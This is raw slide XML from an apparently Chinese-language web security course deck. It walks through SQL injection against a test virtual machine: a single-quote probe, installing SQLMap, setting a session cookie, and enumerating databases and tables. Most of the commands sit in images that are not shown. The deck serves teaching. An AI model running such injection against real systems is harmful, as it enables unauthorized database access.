                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE56BDDB-9779-3E14-3B2B-9FA2D33C0A4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542390" y="5517232"/>
            <a:ext cx="1795699" cy="2454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4353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2C91B1-245D-3264-D824-2C6B17C4E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439410" y="548680"/>
            <a:ext cx="1313180" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8E2ED7-7683-5F26-3314-E3907882ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="1700808"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532F2316-F8C4-30CC-A0EE-C0ED10DFFCF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01</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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C38EC24-B8D7-6357-017D-1BCFE63759D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655840" y="2204864"/>
              <a:ext cx="5040560" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>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kumimoji="1"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注入漏洞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0" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0429C429-E869-FC2A-249C-4485661662EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="2545459"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894D9F5F-EC52-A50D-1DFA-E26CD04C55B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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800"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356FB38-7F76-FBB1-BAC1-AFEF42D8FCFF}"/>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跨站脚本攻击</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2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855A1210-A171-B368-8FFB-791E6AC43F99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="3390110"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DF7540-BE08-FD1B-DAFA-58D87931D42B}"/>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03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="28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AF729870-F782-3B11-E114-7E3B63D7B841}"/>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文件上传漏洞 </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6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4752977-AFBE-91BB-5EFD-D57DA1DF7B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="4229884"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C183CBBE-633F-75AC-4F87-982AEB807369}"/>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04</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1"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2A91F8C-69D7-EC31-B78C-FD051A90CE66}"/>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文件包含漏洞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5" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A6C08E-F0D3-65F8-5E38-54620DB191B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2878912" y="5117021"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8E2C87-E2DD-7351-9A0F-E763C724D8F8}"/>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05</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="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D56E153E-FE61-54F4-E66C-F9F878A1DA82}"/>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反序列化漏洞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090693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FB8CB5A-A07C-4664-551A-90200C1E6296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="1704157"/>
            <a:ext cx="10225136" cy="4461147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4B6FC9-F895-A518-2752-8C29C4708FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1121813"/>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第一步：架设测试虚拟机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17285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20363" y="1540315"/>
            <a:ext cx="10513814"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通过单引号法判断是否能够进行注入：</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603CF949-DA8A-7055-743D-365D9DA91B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="2060848"/>
            <a:ext cx="10225136" cy="4158997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A68D701-3CAE-F3FC-259B-F2A36747A25C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1121813"/>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第二步：寻找注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363472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652778"/>
            <a:ext cx="10513814"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提示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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>' ' ' ' ' </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line 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，初步判定存在注入点。</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2D15BC3-219F-19A1-6348-9593A4355531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="3032956"/>
            <a:ext cx="10513814" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A861ABA-56DD-DE59-48D5-D76403423375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1121813"/>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第二步：寻找注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194929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20305" y="1113280"/>
            <a:ext cx="3902030"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第三步：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>自动注入</a:t>
            </a:r>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69E3F4F-3473-BE94-C81C-8EFB9A1D0A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1636209"/>
            <a:ext cx="10441159" cy="4673844"/>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是一款开源的命令行自动化</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注入工具，用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Python</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开发而成。</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Linux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下，可以通过以下命令来安装：</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pip3 install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访问上面存在注入点的网址：</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要能访问</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页面，需要通过</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login.php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登录，这里我们选</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Yes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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0D74D0-03BF-C93A-D8CC-D30919DC0F20}"/>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A7995197-4DA5-E16D-23E0-1CAF98D67D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="2952375"/>
            <a:ext cx="10572882" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354496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20305" y="1113280"/>
            <a:ext cx="3902030"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第三步：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>自动注入</a:t>
            </a:r>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69E3F4F-3473-BE94-C81C-8EFB9A1D0A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1636209"/>
            <a:ext cx="10441159"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接下来要求我们设置</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cookie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C0D74D0-03BF-C93A-D8CC-D30919DC0F20}"/>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271DF0AD-FF78-4A6F-FF8D-D99742DFCE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="2227789"/>
            <a:ext cx="10520719" cy="3215635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="839547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20305" y="1634472"/>
            <a:ext cx="10513814" cy="826637"/>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Cookie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信息可以通过浏览器“检查”功能获得。浏览器右键打开“检查”，再次提交请求，此时浏览器会记录下请求的信息。请求头部里面包含</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cookie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信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4855DF00-9AAB-1BA4-00B6-0035770AD008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="2564904"/>
            <a:ext cx="10479847" cy="3384377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF704D0-CB1C-D1C6-0DE8-D1F7EBDE49FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973757" y="5445223"/>
            <a:ext cx="8345505" cy="216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47E1CA3-74D9-77B5-48DF-9DA9F351011D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>
            <a:ext cx="305243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第四步：设置</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Cookie</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939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60FA1A7-B0FA-CBD1-06B4-BB26407EBEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1653201"/>
            <a:ext cx="10297144" cy="4584111"/>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F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921228" y="1653201"/>
            <a:ext cx="10287340" cy="4567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CB7DC95A-8E68-FAFA-03F9-EEBCFAF01D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>
            <a:ext cx="305243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第四步：设置</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Cookie</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296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635712"/>
            <a:ext cx="10513814" cy="441852"/>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很快发现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id</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是一个注入点：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4A020C-8465-4A85-E89E-68F400CC8E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="837391" y="2204864"/>
            <a:ext cx="10517218" cy="3563974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839092" y="5517233"/>
            <a:ext cx="7993211" cy="25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23F6ACA-E497-A9DD-F2EC-7B5609A4F93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>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第五步：利用注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2548937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21613" y="1635712"/>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检测完成后，自动利用注入点，我们可以列举数据库信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30440EF8-7ECF-58D7-B7B3-9FE89BA9785B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839093" y="2206446"/>
            <a:ext cx="10513814" cy="574482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DE14CB-4B12-2E29-A110-F6147BE45441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9624392" y="2473742"/>
            <a:ext cx="648072" cy="292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EF170DF-5408-764A-9E86-361241A55144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841797" y="2869759"/>
            <a:ext cx="10513814" cy="441852"/>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越权列举数据库信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1664B12F-5AF3-7056-A255-F12E2B24AEFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="841797" y="3429000"/>
            <a:ext cx="10512959" cy="1047803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837244" y="3802475"/>
            <a:ext cx="2257822" cy="5744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06730D1A-93FF-4F5C-3F1A-FFE0AE587894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>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第五步：利用注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418926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674871A-DE35-D783-3C80-FB62FE719041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846328" y="2204268"/>
            <a:ext cx="10503876" cy="853790"/>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628800"/>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还可以列举数据库中表的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DE14CB-4B12-2E29-A110-F6147BE45441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
